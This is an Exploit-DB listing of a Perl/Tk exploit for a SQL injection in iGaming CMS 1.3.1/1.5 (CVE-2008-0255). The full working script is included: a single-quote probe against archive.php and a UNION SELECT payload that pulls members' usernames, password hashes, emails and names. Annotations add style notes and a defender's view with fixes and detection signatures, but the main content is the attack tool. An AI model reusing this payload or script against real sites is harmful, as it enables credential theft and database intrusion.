iGaming CMS <= 1.3.1/1.5 - Remote SQL Injection Exploit

2008-01-11T00:00:00
ID EDB-ID:4886
Type exploitdb
Reporter Eugene Minaev
Modified 2008-01-11T00:00:00

Description

iGaming CMS <= 1.3.1/1.5 Remote SQL Injection Exploit. CVE-2008-0255. Web-application exploit for the PHP platform.

                                        
                                            #!/usr/bin/perl

	use Tk;
	use Tk::BrowseEntry;
	use Tk::DialogBox;
	use LWP::UserAgent;

	# Tk front end for the archive.php SQL injection check below.
	# NOTE(review): the `-&gt;` / `&lt;` sequences throughout this listing are
	# HTML-escaped `->` / `<` left over from the page rendering, not Perl.
	# The script declares no `use strict; use warnings;`, so every variable
	# here ($mw, $url, $user_id, $hash, ...) is a package global that the two
	# subs at the bottom read and write directly.
	# Style: `new MainWindow(...)` is indirect-object syntax; the conventional
	# form is `MainWindow->new(...)` (indirect syntax is disabled under v5.36+).
	$mw = new MainWindow(title =&gt; "UnderWHAT?!" );

	$mw-&gt;geometry ( '395x180' ) ;
	$mw-&gt;resizable(0,0);

	# Header labels (decorative only).
	$mw-&gt;Label(-text =&gt; '', -font =&gt; '{Verdana} 2',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'iGaming cms &lt;= 1.3.1 Remote Sql Injection', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'found by gemaglabin [ mafia of antichat ]', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; '', -font =&gt; '{Tahoma} 2 bold',-foreground=&gt;'red')-&gt;pack();


	# Two-column layout: captions on the left, inputs/buttons on the right.
	$fleft  = $mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
	$fright = $mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

	# Defaults shown in the entry fields. get_hash() appends "archive.php"
	# directly to $url, so the value is expected to end with a slash.
	# $table and $report are assigned here but not referenced anywhere else
	# in this listing.
	$url      = 'http://test2.ru/igaming/';
	$user_id  = '1';
	$prefix   = 'sp_';
	$table    = 'users';
	$report   = '';
	


	# -textvariable binds each Entry to a global; the subs below assign
	# $hash and the "Returned data" field reflects it (Tk textvariable binding).
	$fleft-&gt;Label ( -text =&gt; 'Path to site index: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'User ID: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$user_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	# $hash doubles as the status line: test_vuln() writes a verdict string
	# into it, get_hash() writes the scraped response fragment.
	$fleft-&gt;Label ( -text =&gt; 'Returned data: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$hash) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
	$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();
	
	# Buttons dispatch to the two subs via code references.
	$fleft-&gt;Label ( -text =&gt; "Test site vulnerability", -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Button(-text    =&gt; "Test site vulnerability",
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&test_vuln
	               )-&gt;pack();
				   
				   
	$fleft-&gt;Label ( -text =&gt; "Get all possible data ", -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Button(-text    =&gt; 'Get data from database',
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&get_hash
	               )-&gt;pack();
				  
	
	# Enter the Tk event loop; nothing below this line runs until a button fires.
	MainLoop();
	
	# Sends a single POST to archive.php whose `section` parameter carries a
	# UNION SELECT over the `<prefix>members` table, then scrapes the value
	# that the page prints after "Date Posted:" into the global $hash.
	#
	# Defender's view: the flaw this relies on is `section` being concatenated
	# into SQL unescaped; casting it to an integer or using a prepared
	# statement removes the injection. A POST body containing
	# `union select ... concat_ws(` aimed at archive.php is a high-confidence
	# detection signature for this exploit.
	#
	# Style: the empty prototype `()` is meaningless here (PBP: never use
	# prototypes for argument checking); it is harmless only because the
	# button invokes the sub through a code reference.
	sub get_hash()
	{
		# `or die` without a message gives no diagnostic on failure.
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		# Dialog is constructed but never shown: nothing in this listing calls
		# ->Show on $InfoWindow, so this line has no visible effect.
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get hash from database', -buttons =&gt; ["OK"]);
		# $prefix and $user_id come straight from the globals/GUI entry fields
		# and are interpolated into the payload unvalidated; $url is expected
		# to end with '/'.
		$res = $xpl-&gt;post($url."archive.php",['section'=&gt;'-1 union select 1,2,concat_ws(char(32),pseudo,pass,email,nom),4 from '.$prefix.'members where id='.$user_id.'/*']);
		# Greedy capture: takes everything from "Date Posted: " up to the last
		# '<' on that line of the raw response. $1 is consumed immediately.
		if($res-&gt;as_string =~ /Date Posted: (.*)&lt;/)
		{
			$hash = $1;
		}
		# No match leaves $hash unchanged (no "not found" indication).
	}

	 
	# Error-based probe: posts a lone single quote as `section` to archive.php
	# and reports the site as vulnerable if the response contains the string
	# "Fatal error" (case-insensitive). Writes the verdict into the global
	# $hash, which is bound to the "Returned data" entry in the main window.
	#
	# Defender's view: this check only works when the target echoes PHP
	# errors to the client (display_errors on). Suppressing error output
	# makes this probe report "SITE UNVULNERABLE" regardless of the actual
	# bug, so error hiding is hardening, not a fix; the fix is to stop
	# building the query from raw input. A single quote in `section` is
	# itself a reasonable low-severity detection signal for probing.
	#
	# Style: empty prototype `()` as in get_hash(); harmless via code ref.
	sub test_vuln()
	{
		# Dialog and labels are built but never shown: nothing in this listing
		# calls ->Show on $InfoWindow.
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'test site vulnerability', -buttons =&gt; ["OK"]);
		$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
		$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
		$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
		# `or die` without a message gives no diagnostic on failure.
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$res = $xpl-&gt;post($url."archive.php",['section'=&gt;"'"]);
		# Any HTTP failure (no response body) also falls into the "else"
		# branch, so network errors are indistinguishable from "not vulnerable".
		if($res-&gt;as_string =~ /Fatal error/i ) { $hash='SITE VULNERABLE'}
		else { $hash = 'SITE UNVULNERABLE'} 
	}

# milw0rm.com [2008-01-11]